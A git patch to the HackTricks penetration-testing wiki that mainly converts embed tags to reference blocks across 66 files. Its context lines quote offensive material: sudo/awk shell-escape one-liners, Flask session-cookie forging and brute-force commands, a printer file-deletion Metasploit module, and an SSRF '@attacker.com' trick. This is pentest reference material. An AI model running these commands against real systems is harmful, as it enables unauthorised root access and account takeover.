From 4374a7457b4fed8bc4ea6bd663710db22ff0edd9 Mon Sep 17 00:00:00 2001 
From: Congon4tor Date: Fri, 3 Jan 2025 02:06:10 +0100 Subject: [PATCH 1/5] Fix embed urls --- src/README.md | 24 +++-- .../ret2dlresolve.md | 6 +- .../README.md | 6 +- src/burp-suite.md | 6 +- src/crypto-and-stego/esoteric-languages.md | 6 +- .../hash-length-extension-attack.md | 6 +- .../rc4-encrypt-and-decrypt.md | 10 +- .../hash-length-extension-attack.md | 6 +- src/cryptography/rc4-encrypt-and-decrypt.md | 10 +- .../external-recon-methodology/README.md | 14 ++- .../privilege-escalation/README.md | 10 +- .../docker-security/README.md | 11 ++- .../interesting-groups-linux-pe/README.md | 10 +- .../interesting-groups-linux-pe.md | 13 ++- src/misc/references.md | 95 ++++++++++++++----- .../5439-pentesting-redshift.md | 7 +- src/network-services-pentesting/9100-pjl.md | 7 +- .../9200-pentesting-elasticsearch.md | 9 +- .../pentesting-compaq-hp-insight-manager.md | 7 +- .../pentesting-kerberos-88/README.md | 7 +- .../pentesting-ssh.md | 11 +-- .../pentesting-web/buckets/README.md | 7 +- .../buckets/firebase-database.md | 7 +- ...solation-rce-via-electron-internal-code.md | 7 +- .../pentesting-web/flask.md | 11 ++- .../pentesting-web/graphql.md | 9 +- .../pentesting-web/uncovering-cloudflare.md | 7 +- .../pentesting-web/werkzeug.md | 9 +- .../pentesting-web/wordpress.md | 7 +- src/other-web-tricks.md | 9 +- src/pentesting-web/captcha-bypass.md | 7 +- .../client-side-template-injection-csti.md | 12 +-- src/pentesting-web/command-injection.md | 9 +- src/pentesting-web/crlf-0d-0a.md | 11 +-- .../README.md | 7 +- .../README.md | 7 +- src/pentesting-web/file-inclusion/README.md | 11 ++- .../file-inclusion/phar-deserialization.md | 11 +-- src/pentesting-web/file-upload/README.md | 9 +- .../hacking-jwt-json-web-tokens.md | 12 +-- src/pentesting-web/ldap-injection.md | 9 +- .../oauth-to-account-takeover.md | 9 +- ...inclusion-edge-side-inclusion-injection.md | 7 +- src/pentesting-web/sql-injection/README.md | 17 ++-- .../rce-with-postgresql-extensions.md | 7 +- .../README.md | 
8 +- .../url-format-bypass.md | 7 +- .../README.md | 10 +- .../unicode-normalization.md | 7 +- ...ble-stylesheet-language-transformations.md | 7 +- .../xss-cross-site-scripting/README.md | 13 ++- .../xxe-xee-xml-external-entity.md | 13 ++- .../stack-overflow/ret2dlresolve.md | 7 +- .../srop-sigreturn-oriented-programming.md | 7 +- .../reversing-tools-basic-methods/README.md | 11 ++- src/stego/esoteric-languages.md | 7 +- src/todo/burp-suite.md | 7 +- src/todo/other-web-tricks.md | 7 +- src/todo/references.md | 95 ++++++++++++++----- .../active-directory-methodology/README.md | 7 +- .../printers-spooler-service-abuse.md | 7 +- .../authentication-credentials-uac-and-efs.md | 8 +- .../README.md | 7 +- src/windows-hardening/av-bypass.md | 17 ++-- .../README.md | 7 +- .../juicypotato.md | 10 +- 66 files changed, 398 insertions(+), 370 deletions(-) diff --git a/src/README.md b/src/README.md index b752c0e12..fae21c7b3 100644 --- a/src/README.md +++ b/src/README.md @@ -35,7 +35,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm [**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. -{% embed url="https://www.rootedcon.com/" %} +{{#ref}} +https://www.rootedcon.com/ +{{#endref}} --- @@ -47,7 +49,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} +{{#ref}} +https://go.intigriti.com/hacktricks +{{#endref}} --- 
@@ -60,7 +64,9 @@ Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banne Get Access Today: -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{{#ref}} +https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks +{{#endref}} --- @@ -86,7 +92,9 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to **Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} +{{#ref}} +https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons +{{#endref}} --- @@ -111,7 +119,9 @@ You can **create a free account** [**here**](https://serpapi.com/users/sign_up)* Learn the technologies and skills required to perform vulnerability research, penetration testing, and reverse engineering to protect mobile applications and devices. **Master iOS and Android security** through our on-demand courses and **get certified**: -{% embed url="https://academy.8ksec.io/" %} +{{#ref}} +https://academy.8ksec.io/ +{{#endref}} --- @@ -127,7 +137,9 @@ Another cool thing about WebSec is that unlike the industry average WebSec is ** In addition to the above WebSec is also a **committed supporter of HackTricks.** -{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %} +{{#ref}} +https://www.youtube.com/watch?v=Zq2JycGDCPM +{{#endref}} ## License & Disclaimer diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index b3a3c1ab8..76be1e36c 100644 
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md @@ -17,7 +17,9 @@ Usually, all these structures are faked by making an **initial ROP chain that ca Chek this video for a nice explanation about this technique in the second half of the video: -{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} +{{#ref}} +https://youtu.be/ADULSwnQs-s?feature=shared +{{#endref}} Or check these pages for a step-by-step explanation: @@ -195,5 +197,3 @@ target.interactive() - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`. {{#include ../../banners/hacktricks-training.md}} - - diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 06cfe6a0d..603ecae17 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md @@ -59,7 +59,9 @@ If you are curious this is the **sigcontext structure** stored in the stack to l For a better explanation check also: -{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} +{{#ref}} +https://youtu.be/ADULSwnQs-s?feature=shared +{{#endref}} ## Example @@ -143,5 +145,3 @@ target.interactive() - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed. {{#include ../../../banners/hacktricks-training.md}} - - diff --git a/src/burp-suite.md b/src/burp-suite.md index 57504ea27..a14e6194b 100644 
--- a/src/burp-suite.md +++ b/src/burp-suite.md @@ -10,10 +10,10 @@ [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab. -{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} +{{#ref}} +https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e +{{#endref}} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) {{#include ./banners/hacktricks-training.md}} - - diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md index 2b1be3259..ac5159708 100644 --- a/src/crypto-and-stego/esoteric-languages.md +++ b/src/crypto-and-stego/esoteric-languages.md @@ -52,7 +52,9 @@ Take it to the top Whisper my world ``` -{% embed url="https://codewithrockstar.com/" %} +{{#ref}} +https://codewithrockstar.com/ +{{#endref}} ## PETOOH @@ -67,5 +69,3 @@ Kukarek ``` {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md index b24f88bd8..1bd54181e 100644 --- a/src/crypto-and-stego/hash-length-extension-attack.md +++ b/src/crypto-and-stego/hash-length-extension-attack.md @@ -29,12 +29,12 @@ If an attacker wants to append the string "append" he can: ### **Tool** -{% embed url="https://github.com/iagox86/hash_extender" %} +{{#ref}} +https://github.com/iagox86/hash_extender +{{#endref}} ### References You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index 00e933705..1ee4b453d 100644 
--- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -4,10 +4,12 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: -{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} +{{#ref}} +https://0xrick.github.io/hack-the-box/kryptos/ +{{#endref}} -{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} +{{#ref}} +https://0xrick.github.io/hack-the-box/kryptos/ +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/cryptography/hash-length-extension-attack.md b/src/cryptography/hash-length-extension-attack.md index 3bcd0e4a2..dc51fa07b 100644 --- a/src/cryptography/hash-length-extension-attack.md +++ b/src/cryptography/hash-length-extension-attack.md @@ -27,12 +27,12 @@ If an attacker wants to append the string "append" he can: ## **Tool** -{% embed url="https://github.com/iagox86/hash_extender" %} +{{#ref}} +https://github.com/iagox86/hash_extender +{{#endref}} ## References You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/cryptography/rc4-encrypt-and-decrypt.md b/src/cryptography/rc4-encrypt-and-decrypt.md index 00e933705..1ee4b453d 100644 --- a/src/cryptography/rc4-encrypt-and-decrypt.md +++ b/src/cryptography/rc4-encrypt-and-decrypt.md 
@@ -4,10 +4,12 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: -{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} +{{#ref}} +https://0xrick.github.io/hack-the-box/kryptos/ +{{#endref}} -{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} +{{#ref}} +https://0xrick.github.io/hack-the-box/kryptos/ +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index 21179e3d8..d265008a4 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## Assets discoveries > So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. @@ -199,8 +198,6 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover. If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ &#xNAN;_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ - - ## Subdomains > We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. 
@@ -482,9 +479,13 @@ echo www | subzuf facebook.com Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer: -{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/" %} +{{#ref}} +https://trickest.com/blog/full-subdomain-discovery-using-workflow/ +{{#endref}} -{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/" %} +{{#ref}} +https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/ +{{#endref}} ### **VHosts / Virtual Hosts** @@ -708,7 +709,4 @@ There are several tools out there that will perform part of the proposed actions - All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) - {{#include ../../banners/hacktricks-training.md}} - - diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 2fb4e830e..5cdc82530 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -1049,9 +1049,13 @@ The project collects legitimate functions of Unix binaries that can be abused to > strace -o /dev/null /bin/sh\ > sudo awk 'BEGIN {system("/bin/sh")}' -{% embed url="https://gtfobins.github.io/" %} +{{#ref}} +https://gtfobins.github.io/ +{{#endref}} -{% embed url="https://gtfoargs.github.io/" %} +{{#ref}} +https://gtfoargs.github.io/ +{{#endref}} ### FallOfSudo @@ -1655,5 +1659,3 @@ cisco-vmanage.md - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/) {{#include ../../banners/hacktricks-training.md}} - - 
diff --git a/src/linux-hardening/privilege-escalation/docker-security/README.md b/src/linux-hardening/privilege-escalation/docker-security/README.md index 4fd8f33e2..5860b72c4 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/README.md @@ -341,13 +341,17 @@ In Kubernetes environments, secrets are natively supported and can be further ma **gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. -{% embed url="https://github.com/google/gvisor" %} +{{#ref}} +https://github.com/google/gvisor +{{#endref}} ### Kata Containers **Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense. -{% embed url="https://katacontainers.io/" %} +{{#ref}} +https://katacontainers.io/ +{{#endref}} ### Summary Tips @@ -403,7 +407,4 @@ authz-and-authn-docker-access-authorization-plugin.md - [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57) - [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/) - {{#include ../../../banners/hacktricks-training.md}} - - 
diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index 92cbb164a..8dd8187fa 100644 --- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -241,9 +241,13 @@ Finally, if you don't like any of the suggestions of before, or they aren't work If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.** -{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} +{{#ref}} +https://github.com/KrustyHack/docker-privilege-escalation +{{#endref}} -{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} +{{#ref}} +https://fosterelli.co/privilege-escalation-via-docker.html +{{#endref}} ## lxc/lxd Group @@ -262,5 +266,3 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey* These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) {{#include ../../../banners/hacktricks-training.md}} - - diff --git a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md index 5fec677b3..19a8323d2 100644 --- a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md +++ b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md @@ -1,7 +1,5 @@ - {{#include ../../banners/hacktricks-training.md}} - # Sudo/Admin Groups ## **PE - Method 1** 
@@ -158,15 +156,16 @@ find / -group root -perm -g=w 2>/dev/null You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. -{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} +{{#ref}} +https://github.com/KrustyHack/docker-privilege-escalation +{{#endref}} -{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} +{{#ref}} +https://fosterelli.co/privilege-escalation-via-docker.html +{{#endref}} # lxc/lxd Group [lxc - Privilege Escalation](lxd-privilege-escalation.md) - {{#include ../../banners/hacktricks-training.md}} - - diff --git a/src/misc/references.md b/src/misc/references.md index 7b4e414f8..eb3792a1f 100644 --- a/src/misc/references.md +++ b/src/misc/references.md 
@@ -1,52 +1,95 @@ {{#include ../banners/hacktricks-training.md}} -{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %} +{{#ref}} +https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick +{{#endref}} -{% embed url="https://hausec.com/pentesting-cheatsheet/#_Toc475368982" %} +{{#ref}} +https://hausec.com/pentesting-cheatsheet/#_Toc475368982 +{{#endref}} -{% embed url="https://anhtai.me/pentesting-cheatsheet/" %} +{{#ref}} +https://anhtai.me/pentesting-cheatsheet/ +{{#endref}} -{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %} +{{#ref}} +https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html +{{#endref}} -{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %} +{{#ref}} +https://ired.team/offensive-security-experiments/offensive-security-cheetsheets +{{#endref}} -{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html" %} +{{#ref}} +https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html +{{#endref}} -{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md" %} +{{#ref}} +https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md +{{#endref}} -{% embed url="https://anhtai.me/oscp-fun-guide/" %} +{{#ref}} +https://anhtai.me/oscp-fun-guide/ +{{#endref}} -{% embed url="https://www.thehacker.recipes/" %} +{{#ref}} +https://www.thehacker.recipes/ +{{#endref}} -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %} +{{#ref}} +https://github.com/swisskyrepo/PayloadsAllTheThings +{{#endref}} -{% embed url="https://gtfobins.github.io/" %} +{{#ref}} +https://gtfobins.github.io/ +{{#endref}} -{% embed url="https://github.com/RistBS/Awesome-RedTeam-Cheatsheet" %} +{{#ref}} +https://github.com/RistBS/Awesome-RedTeam-Cheatsheet +{{#endref}} -{% embed 
url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %} +{{#ref}} +https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet +{{#endref}} -{% embed url="https://hideandsec.sh/" %} +{{#ref}} +https://hideandsec.sh/ +{{#endref}} -{% embed url="https://cheatsheet.haax.fr/" %} +{{#ref}} +https://cheatsheet.haax.fr/ +{{#endref}} -{% embed url="https://infosecwriteups.com/" %} +{{#ref}} +https://infosecwriteups.com/ +{{#endref}} -{% embed url="https://www.exploit-db.com/" %} +{{#ref}} +https://www.exploit-db.com/ +{{#endref}} -{% embed url="https://wadcoms.github.io/" %} +{{#ref}} +https://wadcoms.github.io/ +{{#endref}} -{% embed url="https://lolbas-project.github.io" %} +{{#ref}} +https://lolbas-project.github.io +{{#endref}} -{% embed url="https://pentestbook.six2dez.com/" %} +{{#ref}} +https://pentestbook.six2dez.com/ +{{#endref}} -{% embed url="https://www.hackingarticles.in/" %} +{{#ref}} +https://www.hackingarticles.in/ +{{#endref}} -{% embed url="https://pentestlab.blog/" %} +{{#ref}} +https://pentestlab.blog/ +{{#endref}} -{% embed url="https://ippsec.rocks/" %} +{{#ref}} +https://ippsec.rocks/ +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md index 3dba7811d..9fb89cfc1 100644 --- a/src/network-services-pentesting/5439-pentesting-redshift.md +++ b/src/network-services-pentesting/5439-pentesting-redshift.md @@ -8,9 +8,8 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P For more information check: -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - 
diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md index ddbb65ea2..d81184531 100644 --- a/src/network-services-pentesting/9100-pjl.md +++ b/src/network-services-pentesting/9100-pjl.md @@ -54,13 +54,12 @@ msf> use auxiliary/scanner/printer/printer_delete_file This is the tool you want to use to abuse printers: -{% embed url="https://github.com/RUB-NDS/PRET" %} +{{#ref}} +https://github.com/RUB-NDS/PRET +{{#endref}} # **Shodan** - `pjl port:9100` {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md index fbaf650d7..12dbe733e 100644 --- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## Basic information Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats. @@ -176,14 +175,12 @@ Some tools will obtain some of the data presented before: msf > use auxiliary/scanner/elasticsearch/indices_enum ``` -{% embed url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse" %} +{{#ref}} +https://github.com/theMiddleBlue/nmap-elasticsearch-nse +{{#endref}} ## Shodan - `port:9200 elasticsearch` - {{#include ../banners/hacktricks-training.md}} - - - 
diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index 4a36b9352..924502f45 100644 --- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -4,7 +4,9 @@ # **Default passwords** -{% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %} +{{#ref}} +http://www.vulnerabilityassessment.co.uk/passwordsC.htm +{{#endref}} # Config files @@ -19,6 +21,3 @@ jboss-service.xml ``` {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index 9f396aa6b..71820b4b3 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md @@ -29,7 +29,9 @@ PORT STATE SERVICE The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest. -{% embed url="https://adsecurity.org/?p=541" %} +{{#ref}} +https://adsecurity.org/?p=541 +{{#endref}} Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek) @@ -66,6 +68,3 @@ Entry_4: ``` {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md index 6430b522b..e38740ce7 100644 --- a/src/network-services-pentesting/pentesting-ssh.md +++ b/src/network-services-pentesting/pentesting-ssh.md 
@@ -2,8 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - - ## Basic Information **SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems. @@ -135,7 +133,9 @@ Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms #### Known badkeys can be found here: -{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %} +{{#ref}} +https://github.com/rapid7/ssh-badkeys/tree/master/authorized +{{#endref}} #### Weak SSH keys / Debian predictable PRNG @@ -318,8 +318,6 @@ id_rsa - You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening_guides.html](https://www.ssh-audit.com/hardening_guides.html) - [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide) - - ## HackTricks Automatic Commands ``` @@ -341,6 +339,3 @@ Entry_2: ``` {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md index 02a21b5e7..498f20fa7 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/README.md +++ b/src/network-services-pentesting/pentesting-web/buckets/README.md @@ -4,9 +4,8 @@ Check this page if you want to learn more about enumerating and abusing Buckets: -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum +{{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - 
diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md index 914b893a3..5e7b54490 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -8,9 +8,8 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused Learn more about Firebase in: -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum +{{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index 89a666475..f79ea35d5 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md @@ -17,7 +17,9 @@ process.on("exit", function () { }) ``` -{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %} +{{#ref}} +https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36 +{{#endref}} ![](<../../../images/image (1070).png>) @@ -61,6 +63,3 @@ Exploit:
{{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md index ab4f82e9f..88a03df18 100644 --- a/src/network-services-pentesting/pentesting-web/flask.md +++ b/src/network-services-pentesting/pentesting-web/flask.md @@ -26,7 +26,9 @@ The cookie is also signed using a password Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. -{% embed url="https://pypi.org/project/flask-unsign/" %} +{{#ref}} +https://pypi.org/project/flask-unsign/ +{{#endref}} ```bash pip3 install flask-unsign @@ -60,7 +62,9 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy Command line tool to brute-force websites using cookies crafted with flask-unsign. -{% embed url="https://github.com/Tagvi/ripsession" %} +{{#ref}} +https://github.com/Tagvi/ripsession +{{#endref}} ```bash ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt @@ -100,6 +104,3 @@ app.run(host='0.0.0.0', port=8080) Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**. {{#include ../../banners/hacktricks-training.md}} - - - diff 